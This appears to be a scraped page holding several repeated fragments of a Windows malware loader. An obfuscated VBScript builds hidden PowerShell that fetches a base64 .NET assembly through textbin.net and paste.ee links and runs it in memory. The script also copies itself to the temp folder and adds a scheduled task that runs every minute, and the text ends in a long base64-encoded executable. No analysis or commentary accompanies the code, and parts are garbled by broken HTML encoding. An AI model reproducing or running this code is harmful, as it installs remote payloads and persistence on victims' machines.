ffd%G8\ufffd%ZgB6\ufffd%DM\ufffd%cw\ufffd%2\ufffd%Cc\ufffd%KQ\ufffd%g\ufffd%Ck\ufffd%I\ufffd%\ufffd%p\ufffd%Ds\ufffd%WwBz\ufffd%Hk\ufffd%cwB0\ufffd%GU\ufffd%bQ\ufffd%u\ufffd%EE\ufffd%c\ufffd%Bw\ufffd%EQ\ufffd%bwBt\ufffd%GE\ufffd%aQBu\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EM\ufffd%dQBy\ufffd%HI\ufffd%ZQBu\ufffd%HQ\ufffd%R\ufffd%Bv\ufffd%G0\ufffd%YQBp\ufffd%G4\ufffd%LgBM\ufffd%G8\ufffd%YQBk\ufffd%Cg\ufffd%J\ufffd%Bk\ufffd%Gg\ufffd%ZwBs\ufffd%Gw\ufffd%KQ\ufffd%u\ufffd%Ec\ufffd%ZQB0\ufffd%FQ\ufffd%eQBw\ufffd%GU\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%YQBy\ufffd%GE\ufffd%YwBh\ufffd%Gk\ufffd%YgBv\ufffd%C4\ufffd%QwBs\ufffd%GE\ufffd%cwBz\ufffd%DE\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%RwBl\ufffd%HQ\ufffd%TQBl\ufffd%HQ\ufffd%a\ufffd%Bv\ufffd%GQ\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%cwBx\ufffd%EI\ufffd%SQBi\ufffd%Fk\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%SQBu\ufffd%HY\ufffd%bwBr\ufffd%GU\ufffd%K\ufffd%\ufffd%k\ufffd%G4\ufffd%dQBs\ufffd%Gw\ufffd%L\ufffd%\ufffd%g\ufffd%Fs\ufffd%bwBi\ufffd%Go\ufffd%ZQBj\ufffd%HQ\ufffd%WwBd\ufffd%F0\ufffd%I\ufffd%\ufffd%o\ufffd%Cc\ufffd%M\ufffd%\ufffd%v\ufffd%Es\ufffd%dwBC\ufffd%FI\ufffd%Vw\ufffd%v\ufffd%GQ\ufffd%LwBl\ufffd%GU\ufffd%LgBl\ufffd%HQ\ufffd%cwBh\ufffd%H\ufffd%\ufffd%Lw\ufffd%v\ufffd%Do\ufffd%cwBw\ufffd%HQ\ufffd%d\ufffd%Bo\ufffd%Cc\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%J\ufffd%By\ufffd%GQ\ufffd%YQB1\ufffd%G4\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%JwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%n\ufffd%Cw\ufffd%I\ufffd%\ufffd%k\ufffd%GU\ufffd%bwBo\ufffd%GU\ufffd%cQ\ufffd%s\ufffd%C\ufffd%\ufffd%Jw\ufffd%x\ufffd%Cc\ufffd%L\ufffd%\ufffd%g\ufffd%Cc\ufffd%UgBv\ufffd%GQ\ufffd%YQ\ufffd%n\ufffd%C\ufffd%\ufffd%KQ\ufffd%p\ufffd%Ds\ufffd%")\r\n\r\n$eoheq = '03';\r\n$rdaun = '%pzAcOgInMr%';\r\nByte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https:\/\/textbin.net\/raw\/ezjmofz3s6') ) );\r\n[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0\/KwBRW\/d\/ee.etsap\/\/:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));\r\n\r\ndim waalb\r\nwaalb = ("$dgUdYL = '") &amp;amp;amp;amp;amp; HwxcO &amp;amp;amp;amp;amp; "'" \r\nwaalb = waalb &amp;amp;amp;amp;amp; ";\r\n$KByHL = [system.Text.Encoding]::Unicode.GetString( "\r\n\r\nwaalb = waalb &amp;amp;amp;amp;amp; "[system.Convert]::FromBase64String( $dgUdYL.replace('\ufffd%','A') ) )"\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\nwaalb = waalb &amp;amp;amp;amp;amp; ";\r\n$KByHL = $KByHL.replace('%pzAcOgInMr%', '" &amp;amp;amp;amp;amp; ARmxU &amp;amp;amp;amp;amp; "');powershell -command $KByHL;" \r\n\r\nset sjddc = CreateObject("WScript.Shell")\r\nsjddc.Run "powershell -command " &amp;amp;amp;amp;amp; (waalb) , 0, false\r\nEnd function\r\nSet JYXNc = vkrLKQUSi("lsZsUULOa")\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\r\n<\/pre>\n\r\nSet objShell = CreateObject("WScript.Shell")\r\nzoologico = "MinhaTarefaVBScript"\r\neCoeCoeCoeCo = "schtasks \/delete \/tn " &amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp; " \/f"\r\nobjShell.Run eCoeCoeCoeCo, 0, True\r\nstrScriptPath = WScript.ScriptFullName\r\nstrTempFolder = objShell.ExpandEnvironmentStrings("%TEMP%")\r\nMirasoles = strTempFolder &amp;amp;amp;amp;amp; "\\SeuScript.vbs"\r\n' Cria um objeto FileSystemObject\r\nSet objFSO = CreateObject("Scripting.FileSystemObject")\r\nOn Error Resume Next\r\n' Tenta copiar o arquivo para a pasta tempor\ufffdria\r\nobjFSO.CopyFile strScriptPath, Mirasoles, True\r\nIf Err.Number &amp;amp;amp;amp;lt;&amp;amp;amp;amp;gt; 0 Then\r\nMsgBox "Erro ao copiar o arquivo para a pasta tempor\ufffdria: " &amp;amp;amp;amp;amp; Err.Description\r\nEnd If\r\nOn Error GoTo 0\r\nstrCreateCommand = "schtasks \/create \/tn " &amp;amp;amp;amp;amp; zoologico &amp;amp;amp;amp;amp; " \/tr """ &amp;amp;amp;amp;amp; Mirasoles &amp;amp;amp;amp;amp; """ \/sc minute \/mo 1"\r\nobjShell.Run strCreateCommand, 0, True\r\nend if\r\nmmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:lvueu:mmhou:\r\ndim ARmxU \r\n\r\nARmxU = WScript.ScriptFullName\r\nHwxcO = ("J\ufffd%Bl\ufffd%G8\ufffd%a\ufffd%Bl\ufffd%HE\ufffd%I\ufffd%\ufffd%9\ufffd%C\ufffd%\ufffd%Jw\ufffd%w\ufffd%DM\ufffd%Jw\ufffd%7\ufffd%CQ\ufffd%cgBk\ufffd%GE\ufffd%dQBu\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Cc\ufffd%JQBw\ufffd%Ho\ufffd%QQBj\ufffd%E8\ufffd%ZwBJ\ufffd%G4\ufffd%TQBy\ufffd%CU\ufffd%Jw\ufffd%7\ufffd%Fs\ufffd%QgB5\ufffd%HQ\ufffd%ZQBb\ufffd%F0\ufffd%XQ\ufffd%g\ufffd%CQ\ufffd%Z\ufffd%Bo\ufffd%Gc\ufffd%b\ufffd%Bs\ufffd%C\ufffd%\ufffd%PQ\ufffd%g\ufffd%Fs\ufffd%cwB5\ufffd%HM\ufffd%d\ufffd%Bl\ufffd%G0\ufffd%LgBD\ufffd%G8\ufffd%bgB2\ufffd%GU\ufffd%cgB0\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EY\ufffd%cgBv\ufffd%G0\ufffd%QgBh\ufffd%HM\ufffd%ZQ\ufffd%2\ufffd%DQ\ufffd%UwB0\ufffd%HI\ufffd%aQBu\ufffd%Gc\ufffd%K\ufffd%\ufffd%g\ufffd%Cg\ufffd%TgBl\ufffd%Hc\ufffd%LQBP\ufffd%GI\ufffd%agBl\ufffd%GM\ufffd%d\ufffd%\ufffd%g\ufffd%E4\ufffd%ZQB0\ufffd%C4\ufffd%VwBl\ufffd%GI\ufffd%QwBs\ufffd%Gk\ufffd%ZQBu\ufffd%HQ\ufffd%KQ\ufffd%u\ufffd%EQ\ufffd%bwB3\ufffd%G4\ufffd%b\ufffd%Bv\ufffd%GE\ufffd%Z\ufffd%BT\ufffd%HQ\ufffd%cgBp\ufffd%G4\ufffd%Zw\ufffd%o\ufffd%C\ufffd%\ufffd%K\ufffd%BO\ufffd%GU\ufffd%dw\ufffd%t\ufffd%E8\ufffd%YgBq\ufffd%GU\ufffd%YwB0\ufffd%C\ufffd%\ufffd%TgBl\ufffd%HQ\ufffd%LgBX\ufffd%GU\ufffd%YgBD\ufffd%Gw\ufffd%aQBl\ufffd%G4\ufffd%d\ufffd%\ufffd%p\ufffd%C4\ufffd%R\ufffd%Bv\ufffd%Hc\ufffd%bgBs\ufffd%G8\ufffd%YQBk\ufffd%FM\ufffd%d\ufffd%By\ufffd%Gk\ufffd%bgBn\ufffd%Cg\ufffd%JwBo\ufffd%HQ\ufffd%d\ufffd%Bw\ufffd%HM\ufffd%Og\ufffd%v\ufffd%C8\ufffd%d\ufffd%Bl\ufffd%Hg\ufffd%d\ufffd%Bi\ufffd%Gk\ufffd%bg\ufffd%u\ufffd%G4\ufffd%ZQB0\ufffd%C8\ufffd%cgBh\ufffd%Hc\ufffd%LwBl\ufffd%Ho\ufffd%agBt\ufffd%G8\ufffd%ZgB6\ufffd%DM\ufffd%cw\ufffd%2\ufffd%Cc\ufffd%KQ\ufffd%g\ufffd%Ck\ufffd%I\ufffd%\ufffd%p\ufffd%Ds\ufffd%WwBz\ufffd%Hk\ufffd%cwB0\ufffd%GU\ufffd%bQ\ufffd%u\ufffd%EE\ufffd%c\ufffd%Bw\ufffd%EQ\ufffd%bwBt\ufffd%GE\ufffd%aQBu\ufffd%F0\ufffd%Og\ufffd%6\ufffd%EM\ufffd%dQBy\ufffd%HI\ufffd%ZQBu\ufffd%HQ\ufffd%R\ufffd%Bv\ufffd%G0\ufffd%YQBp\ufffd%G4\ufffd%LgBM\ufffd%G8\ufffd%YQBk\ufffd%Cg\ufffd%J\ufffd%Bk\ufffd%Gg\ufffd%ZwBs\ufffd%Gw\ufffd%KQ\ufffd%u\ufffd%Ec\ufffd%ZQB0\ufffd%FQ\ufffd%eQBw\ufffd%GU\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%YQBy\ufffd%GE\ufffd%YwBh\ufffd%Gk\ufffd%YgBv\ufffd%C4\ufffd%QwBs\ufffd%GE\ufffd%cwBz\ufffd%DE\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%RwBl\ufffd%HQ\ufffd%TQBl\ufffd%HQ\ufffd%a\ufffd%Bv\ufffd%GQ\ufffd%K\ufffd%\ufffd%n\ufffd%E0\ufffd%cwBx\ufffd%EI\ufffd%SQBi\ufffd%Fk\ufffd%Jw\ufffd%p\ufffd%C4\ufffd%SQBu\ufffd%HY\ufffd%bwBr\ufffd%GU\ufffd%K\ufffd%\ufffd%k\ufffd%G4\ufffd%dQBs\ufffd%Gw\ufffd%L\ufffd%\ufffd%g\ufffd%Fs\ufffd%bwBi\ufffd%Go\ufffd%ZQBj\ufffd%HQ\ufffd%WwBd\ufffd%F0\ufffd%I\ufffd%\ufffd%o\ufffd%Cc\ufffd%M\ufffd%\ufffd%v\ufffd%Es\ufffd%dwBC\ufffd%FI\ufffd%Vw\ufffd%v\ufffd%GQ\ufffd%LwBl\ufffd%GU\ufffd%LgBl\ufffd%HQ\ufffd%cwBh\ufffd%H\ufffd%\ufffd%Lw\ufffd%v\ufffd%Do\ufffd%cwBw\ufffd%HQ\ufffd%d\ufffd%Bo\ufffd%Cc\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%J\ufffd%By\ufffd%GQ\ufffd%YQB1\ufffd%G4\ufffd%I\ufffd%\ufffd%s\ufffd%C\ufffd%\ufffd%JwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%XwBf\ufffd%F8\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%t\ufffd%C0\ufffd%LQ\ufffd%n\ufffd%Cw\ufffd%I\ufffd%\ufffd%k\ufffd%GU\ufffd%bwBo\ufffd%GU\ufffd%cQ\ufffd%s\ufffd%C\ufffd%\ufffd%Jw\ufffd%x\ufffd%Cc\ufffd%L\ufffd%\ufffd%g\ufffd%Cc\ufffd%UgBv\ufffd%GQ\ufffd%YQ\ufffd%n\ufffd%C\ufffd%\ufffd%KQ\ufffd%p\ufffd%Ds\ufffd%")\r\n\r\n$eoheq = '03';\r\n$rdaun = '%pzAcOgInMr%';\r\nByte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https:\/\/textbin.net\/raw\/ezjmofz3s6') ) );\r\n[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0\/KwBRW\/d\/ee.etsap\/\/:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));\r\n\r\ndim waalb\r\nwaalb = ("$dgUdYL = '") &amp;amp;amp;amp;amp; HwxcO &amp;amp;amp;amp;amp; "'" \r\nwaalb = waalb &amp;amp;amp;amp;amp; ";\r\n$KByHL = [system.Text.Encoding]::Unicode.GetString( "\r\n\r\nwaalb = waalb &amp;amp;amp;amp;amp; "[system.Convert]::FromBase64String( $dgUdYL.replace('\ufffd%','A') ) )"\r\n'DgWuA and returns whether JoYB is enabled or disabled. Flavors are JoYB PTNJlzJZf,\r\n\r\n\r\nwaalb = waalb &amp;amp;amp;amp;amp; ";\r\n$KByHL = $KByHL.replace('%pzAcOgInMr%', '" &amp;amp;amp;amp;amp; ARmxU &amp;amp;amp;amp;amp; "');powershell -command $KByHL;" \r\n\r\nset sjddc = CreateObject("WScript.Shell")\r\nsjddc.Run "powershell -command " &amp;amp;amp;amp;amp; (waalb) , 0, false\r\nEnd function\r\n<\/pre>\n\n
\n
\r\nwaalb = waalb &amp;amp;amp;amp;amp; "[system.Convert]::FromBase64String( $dgUdYL.replace('\ufffd%','A') ) )"\r\n<\/pre>\n\r\n$eoheq = '03';\r\n$rdaun = '%pzAcOgInMr%';\r\nByte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https:\/\/textbin.net\/raw\/ezjmofz3s6') ) );\r\n[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0\/KwBRW\/d\/ee.etsap\/\/:sptth' , $rdaun , '____________________________________________-------', $eoheq, '1', 'Roda' ));\r\n<\/pre>\n\r\nARmxU = WScript.ScriptFullName\r\nHwxcO = ("$eoheq = '03'; $rdaun = '%pzAcOgInMr%'; &amp;amp;amp;amp;nbsp;\r\nByte[]] $dhgll = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https:\/\/textbin.net\/raw\/ezjmofz3s6') ) );\r\n[system.AppDomain]::CurrentDomain.Load($dhgll).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0\/KwBRW\/d\/ee.etsap\/\/:sptth' , %pzAcOgInMr% , '____________________________________________-------', 03, '1', 'Roda' ));")\r\n\r\n$KByHL = $KByHL.replace('%pzAcOgInMr%', '" &amp;amp;amp;amp;amp; ARmxU &amp;amp;amp;amp;amp; "');\r\npowershell -command $KByHL;"\r\nset sjddc =&amp;amp;amp;amp;nbsp; CreateObject("WScript.Shell")\r\nsjddc.Run "powershell -command " &amp;amp;amp;amp;amp; (waalb) , 0, false\r\n<\/pre>\n\r\nTVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEXln2UAAAAAAAAAAOAAIiALAVAAADYAAAAGAAAAAAAAjlQAAAAgAAAAAAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADRUAABXAAAAAGAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAlDQAAAAgAAAANgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAAAEAAAAYAAAAAQAAAA4AAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAAPAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABwVAAAAAAAAEgAAAACAAUA1DIAAGAhAAABAAAAAAAAAAQyAADQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqJgACKAQAAAoAKgAAEzAIAN0AAAABAAAREgAgvz21R2UgekGf5VkgQk9PDmFlIG3X5NxYIKe+TwBlIFVBsP9ZGGMgCIDz4RdjINaDewFZIO3DgRBYH\/pmIEWXmRRlZiCuaGbrWGUg++jW4iD79dbiWRdiHWNlKz0oBgAACgYoBwAACisWEgIoCAAACiMAAAAAAAAAADYCKwUrMAwr5yBAr1MVF2NlILKKawNYIBKzwfhZCysHKAkAAAorvCAui3bsINB0iRNYZgdbCysAcwoAAAqAAQAABHMLAAAKgAIAAARzDAAACoADAAAEcw0AAAqABAAABCoAAAATMAUAdAAAAAIAABESASBahSogIPpVSt9hIEurKQtZZSDD0sgLWSCz737IIMXdjRtYZSCoMvMbYRtjIKEeNtkgROHJJlhmKxEoBgAACgcoDgAACiwCKwkrCigPAAAKK+gWKwMXKwAtBnMQAAAKeisAAH4BAAAEbxEAAAoKKwAGKhMwBQCSAAAAAwAAERIBIJgD2CkgmAnWKVkcYyDMWNn7IK1JaxRZIOLwkRhYIArhpBog\/stp5mEgVpbf\/1hmIGbBrPxYKysHKAYAAAooEgAACiwDFisDFysALTEg9zj7+yDLlL7iWGYgPTJGIWFlDCsHKA8AAAorziAes1LaII\/+1fpZII60fN9hCFsMKwAAfgIAAARvEwAACgorAAYqAAATMAEAEAAAAAQAABEAfgMAAARvFAAACgorAAYqEzABABAAAAAFAAARAH4EAAAEbxUAAAoKKwAGKhMwAgASAAAABgAAEQACAygZAAAKKBoAAAoKKwAGKgAAEzABAAwAAAAHAAARAAIoGwAACgorAAYqEzAIAKEAAAAIAAAREgEgaTsZFGYgrrzm61kgzo0N\/CBfgwsLWSCQ9f0OWGUg1fWL7iDpkuXoWSAJnVn6YWYgbiD\/9yD4xPjoYSB8G\/jgWCBDcejHIMohvhVYIO+Spt1ZICAqrullILjVURZZKw4HKAYAAAooBwAACgwrBygJAAAKK+sSAigIAAAKIwAAAAAAAAAANAZzHAAACnorAADQBQAAAigdAAAKCisABioAAAATMAgAzQAAAAkAABESASA18UP7ZiCKz7sEWWUZY2UgnBDcRGUg7E8gJVkZYyDuc8DyWSBng+crZiAc+z0nWCCvd1b7YSA+fObYZiBEfObYWCAoiOvjIHIDRx9hIMd0UwNYINtqeOcgIi6VEFkgYsMcKWFmKzsoBgAACgcoBwAACisWEgMoCAAACiMAAAAAAAAAADYCKwUrMw0r5yAVJJrlILTBjRFhZSBfGugLYQwrBygJAAAKK74g21\/kJiCgoZIiWSDGQa77WAhbDCsAAAIoHgAACgorAAYqAAAAEzACACUAAAAKAAARAAKMBQAAGxT+ASsHBywCKwUrCwsr9igBAAArCisFAAIKKwAGKiYAA\/4VBQAAGyomAAIoIAAACgAqAAAAEzACAEcAAAALAAARAAJ7IgAACm8jAAAKKzAHjAgAABsU\/gErHwgrFSgCAAArCwJ7IgAACgdvJAAACgArBCwIK+cAKwMMK94AKwMLK80HCisABipqAAIrAwArByggAAAKK\/YCcyUAAAp9IgAACioAABMwAgBSAAAADAAAEQB+BgAABBQoJwAACis3BystcgEAAHAgLecAACgaAAAG0AcAAAIoHQAACm8oAAAKcykAAAoMCIAGAAAEACsELAIrzwArAwsrxn4GAAAECisABioAABMwBQB6AAAADQAAERIBILTY6flmIDMvFgZZZSAfJZ8DZiAPJZ8DYWYaYyDQzzAjILAJNd9YZSBlJpr9WSskBygGAAAKKBIAAAosAxYrAxcrAC0mIFofD+dmIFsfD+dYDCsHKA8AAAor1SDd8ZLyICUObQ1YF2MIWwwrAAB+BwAABAorAAYqAAATMAMAggAAAA4AABESACtKEgAgn4C7ESCPEe0XYRhjIKOjlQFhKCoAAAorRxIAIFTEmA4g50iZ1lhmIMXyzRpZZigrAAAKChIAI+3Nq4lnRzpAKCwAAAoKKwj+FQkAAAErrigGAAAKBigOAAAKLAIrBSsGCiu2FisDFysALQZzEAAACnorAAACgAcAAAQqAAATMAUAhwAAAAEAABESACAO4ykLZiAFH9b0YRdiIGAiB\/QgLs2f6GEg0hBn41gbYyDLNZD\/ZiAZym8AWSsuBigGAAAKKAcAAAorFhICKAgAAAojAAAAAAAAAAA0AisFKxwMK+cf\/BhjZgsrBygPAAAKK8sf+BpiHGNmB1sLKwBzFQAABigvAAAKdAgAAAKACAAABCoeAigwAAAKKgATMAEACwAAAA8AABEAfggAAAQKKwAGKgATMAEACwAAAA8AABEAKBYAAAYKKwAGKh4CKCAAAAoqABswCwDABgAAEAAAEQA48gQAABc4WwMAAAkFcikAAHAgTOsAACgaAAAGbzEAAAr+ATjfAgAAEQQ5fwAAACgyAAAKEwUWEwYrZREFEQaaEwcRB28zAAAKbzQAAApyLQAAcCA14QAAKBoAAAYoNAAACm8xAAAKEQdvMwAACm80AAAKcj8AAHAgs+gAACgaAAAGKDQAAApvMQAACmATCBEILAU4JgYAAAAAEQYX1hMGEQYRBY5p\/gQTCREJLY0AAwp+NQAACgsDczYAAAoMA283AAAKbzgAAApyVQAAcCAr5AAAKBoAAAYoNwAACm8xAAAKEwoRCiwTcl0AAHAgU+UAACgaAAAGCwArNwADbzcAAApvOAAACnJnAABwICDkAAAoGgAABig3AAAKbzEAAAomcm0AAHAgE+oAACgaAAAGCwAAFxMLEQsFcnUAAHAg\/PIAACgaAAAGbzEAAAr+ARMMEQw5hAEAAAAbjSEAAAElFnJ5AABwIOznAAAoGgAABqIlFwSiJRhyNgEAcCAX9QAAKBoAAAaiJRkoOQAACqIlGnKcAQBwIDzhAAAoGgAABqIoOgAAChMNKDkAAApyBgIAcCBI5wAAKBoAAAYoOwAAChENKDwAAAoAchYCAHAgq+wAACgaAAAGKDkAAApyBgIAcCBI5wAAKBoAAAYoPQAAChYWFSg+AAAKJhuNIQAAASUWcrECAHAgQ+IAACgaAAAGoiUXA6IlGHLnAgBwICLwAAAoGgAABqIlGSg5AAAKoiUacgkDAHAgAu0AACgaAAAGoig6AAAKFhYVKD4AAAomcg0DAHAgN\/gAACgaAAAGEw4bjSEAAAElFhEOoiUXcmcDAHAgaPcAACgaAAAGoiUYKDkAAAqiJRkIbz8AAAqiJRpyDgQAcCB59gAAKBoAAAaiKDoAAAoTDig5AAAKcigEAHAgU+cAACgaAAAGKDsAAAoRDig8AAAKAN4QJShAAAAKEw8AKEEAAAreAAAAABcTEBEQBXI4BABwIKryAAAoGgAABm8xAAAK\/gETERERLAIrDDjtAQAAEwQ4Gv3\/\/xuNIQAAASUWcrECAHAgQ+IAACgaAAAGoiUXA6IlGHLnAgBwICLwAAAoGgAABqIlGSg5AAAKoiUacgkDAHAgAu0AACgaAAAGoig6AAAKFhYVKD4AAAomKwYNOJ\/8\/\/8AcjwEAHAg1+YAACgaAAAGclgEAHAoQgAACigZAAAKExIREhRyWgQAcCBt9gAAKBoAAAYXjQcAAAElFh0oQwAACnJ4BABwIGX2AAAoGgAABgRyfAQAcCDO6wAAKBoAAAYoRAAACqIUFBQoRQAACigZAAAKExMRExRyhgQAcCAh6wAAKBoAAAYXjQcAAAElFnKcBABwIFH2AAAoGgAABqIUFChGAAAKABETFHKyBABwIDT4AAAoGgAABheNBwAAASUWcsYEAHAgLfcAACgaAAAGKDkAAAoIbz8AAApyCQMAcCAC7QAAKBoAAAYoRAAACqIUFChGAAAKABETFHI2BQBwIIH1AAAoGgAABheNBwAAASUWclAFAHAgzOsAACgaAAAGohQUKEYAAAoAERMUcnQFAHAgs\/QAACgaAAAGF40HAAABJRYXjCoAAAGiFBQoRgAACgARExRyjAUAcCCX8QAAKBoAAAYWjQcAAAEUFBQXKEcAAAom3hAlKEAAAAoTFAAoQQAACt4AAAArBgA4CPv\/\/wAgAAwAAChIAAAKAHKWBQBwIAzoAAAoGgAABhMVc0kAAAoTFhEWKEoAAApvSwAACgARFhEWERUoTAAACm9NAAAKb00AAAoTFxEXKEwAAAoTFxEXctwFAHAgNuMAACgaAAAGcuAFAHAgousAACgaAAAGb04AAAoTFwIoTAAAChMYc0kAAAoTGX41AAAKExoAFxMcERwRGG80AAAKcuQFAHAgXu0AACgaAAAGKDQAAApvMQAACv4BEx0RHSwnc0kAAAoRGChNAAAKExpzSQAAChEaKE0AAAoTGhEaKEwAAAoTGisfERwTHREdLBdzSQAAChEYKE0AAAoTGhEaKEwAAAoTGgBy8AUAcCBq4gAAKBoAAAYoTAAAChMbERtyNgYAcCC67wAAKBoAAAYoTAAACig7AAAKExsoTwAAChEXKFAAAApvUQAACnJOBgBwIEDmAAAoGgAABm9SAAAKcmoGAHAgD+YAACgaAAAGb1MAAAoUGI0HAAABJRYRG3J4BgBwIKHyAAAoGgAABig7AAAKoiUXERooUAAACqJvVAAACibeHyUoQAAAChMeABEeb1UAAAoWFChWAAAKJihBAAAK3gAAKkFMAAAAAAAAWQEAAHMBAADMAgAAEAAAABEAAAEAAAAAbQMAAHcBAADkBAAAEAAAABEAAAEAAAAA\/gQAAKEBAACfBgAAHwAAABEAAAETMAUAkQAAAAEAABESACBPJnvlZSBxGXvlYWUZYyDZi4v9INiLi\/1ZIM\/14BVlIKuyLAZYIAYT5dhZIIpZmehYG2MrLSgGAAAKBigHAAAKDBICKAgAAAojAAAAAAAAAAA2LCB98IIKIH7wggpZZgsrBygPAAAKK8wgCsYQ\/SAqWwb4WGYgNCEX9WFlB1sLKwB+CgAABAIDbyMAAAYqAAAAEzAFALEAAAARAAARcpIGAHAoVwAACjiPAAAA\/gwAAI5p\/g4BADg0AAAA\/gwAAP4MAQD+DAAA\/gwBAJMguxsx8GUgnF3RGFllIGSCxBFhZSD\/4BkDWSBEIx\/kYWHRnf4MAQAgVkcJH2ZlIESk+hdhIOgcDPdYZiACAAAAY1kl\/g4BACBJKngmIH14AwNYZiD\/nXkSWCA4+\/3oWWU8BQAAADgOAAAAOID\/\/\/\/+DgAAOGj\/\/\/\/+DAAAc1gAAAoqKv4JAAAoIAAACip6AAAU\/gYbAAAGcx0AAAaACQAABHMiAAAGgAoAAAQqABMwBAD3AAAAEgAAEf4JAAA4swAAAChZAAAKfgkAAARvHgAABm9aAAAKOBMAAAD+DAAAOQUAAAA4DgAAADgiAAAA\/g4AADjk\/\/\/\/IOQ8LC4g9KQ\/71hmICgelOJZZmU4LwAAACDP28IBZiALXNTxYSACAAAAYiAA2oElWSCvwOQNWCBt39MeWSAv6DQJYTgAAAAAOmsAAAD+CQAAIDd6MA0g12o1CmEgBAAAAGNmIJveLvFYIJyNvvBhjTkAAAF9CwAABDg